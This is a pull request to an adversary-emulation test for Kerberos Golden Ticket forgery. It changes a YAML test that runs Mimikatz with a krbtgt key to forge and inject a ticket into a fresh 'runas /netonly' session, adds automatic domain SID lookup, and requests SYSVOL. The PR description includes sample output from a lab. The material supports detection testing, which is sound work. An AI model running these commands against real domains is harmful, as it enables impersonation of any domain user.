### PR TITLE
Fix Golden Ticket that seemed to work even with wrong parameters

### DIFF
--- a/atomics/T1558.001/T1558.001.yaml
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -11,9 +11,9 @@ atomic_tests:
     - windows
   input_arguments:
     domain_sid:
-      description: Sid of the targeted domain
+      description: SID of the targeted domain, if you keep default it will automatically get the current domain SID
       type: string
-      default: S-1-5-21-1723555596-1415287819-2705645101
+      default: S-1-5-21-DEFAULT
     domain:
       description: Targeted domain FQDN
       type: string
@@ -50,6 +50,15 @@ atomic_tests:
       Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
       Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
 
+      # get current domain SID if default was used
+      $domain_sid = "#{domain_sid}"
+      If ($domain_sid -Match "DEFAULT") {
+        # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
+        $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
+        $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
+        $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
+      }
+
       # create batch file with commands to run in a separate "runas /netonly" session
       # so we don't purge Kerberos ticket from the current Windows session
       # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@@ -57,7 +66,7 @@ atomic_tests:
       >%TEMP%\golden.txt 2>&1 (
         echo Purge existing tickets and create golden ticket:
         klist purge
-        #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:#{domain_sid} /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
+        #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
 
         echo.
         echo Requesting SYSVOL:
@@ -70,7 +79,7 @@ atomic_tests:
         echo.
         echo End of Golden Ticket attack
       )
-      "@ | Out-File -Encoding OEM $env:TEMP\golden.bat
+      "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
       
       # run batch file in a new empty session (password and username do not matter)
       echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null

--- a/atomics/T1558.001/T1558.001.yaml
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -5,7 +5,8 @@ atomic_tests:
   auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
   description: |
     Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain.
-    This test crafts a Golden Ticket and then performs an SMB request with it, thus triggering a service ticket request (event ID 4769).
+    This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+    The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
   supported_platforms:
     - windows
   input_arguments:
@@ -14,7 +15,7 @@ atomic_tests:
       type: string
       default: S-1-5-21-1723555596-1415287819-2705645101
     domain:
-      description: Targeted domain
+      description: Targeted domain FQDN
       type: string
       default: example.com
     account:
@@ -25,14 +26,10 @@ atomic_tests:
       description: Krbtgt AES256 key
       type: string
       default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
-    machine:
-      description: machine to target (without domain suffix) with crafted golden ticket
-      type: string
-      default: server
     mimikatz_path:
       description: Mimikatz windows executable
       type: path
-      default: '%tmp%\mimikatz\x64\mimikatz.exe'
+      default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -47,12 +44,48 @@ atomic_tests:
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
   executor:
-    name: command_prompt
+    name: powershell
     elevation_required: false
     command: |
-      klist purge
-      #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:#{domain_sid} /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
-      net view \\#{machine}.#{domain}
-      echo End of Golden Ticket attack
-    cleanup_command: |
-      klist purge
+      Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+      Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+
+      # create batch file with commands to run in a separate "runas /netonly" session
+      # so we don't purge Kerberos ticket from the current Windows session
+      # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
+      @"
+      >%TEMP%\golden.txt 2>&1 (
+        echo Purge existing tickets and create golden ticket:
+        klist purge
+        #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:#{domain_sid} /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
+
+        echo.
+        echo Requesting SYSVOL:
+        dir \\#{domain}\SYSVOL
+        
+        echo.
+        echo Tickets after requesting SYSVOL:
+        klist
+
+        echo.
+        echo End of Golden Ticket attack
+      )
+      "@ | Out-File -Encoding OEM $env:TEMP\golden.bat
+      
+      # run batch file in a new empty session (password and username do not matter)
+      echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
+      
+      # wait until the output file has logged the entire attack
+      do {
+        Start-Sleep 1 # wait a bit so the output file has time to be created
+        Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
+          if ($_ -match 'End of Golden Ticket attack') { break } 
+        }
+      } while ($false) # dummy loop so that 'break' can be used
+
+      # show output from new empty session
+      Get-Content $env:TEMP\golden.txt
+
+      # cleanup temp files
+      Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+      Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore


### PR DESCRIPTION
Before the golden ticket was injected in the current session which had the issue, first, of clearing the current tickets in the current session. Then, it seemed to work with an invalid Golden Ticket because somehow Windows managed to get the valid normal TGT and use it instead.
Now we create a new empty windows session (with runas /netonly) and work in it so we don't pollute the current normal session, and we don't have false positives.

Also, remove the "machine" parameter since we now use the domain SYSVOL share to trigger a TGS request. So one less dependency (needed an additional target machine in domain)

And add support for default domain SID (one less parameter to specify) and we can remove it from our webapp

With default:
```
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt
```

With specific SID ("toto"):
```
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt
```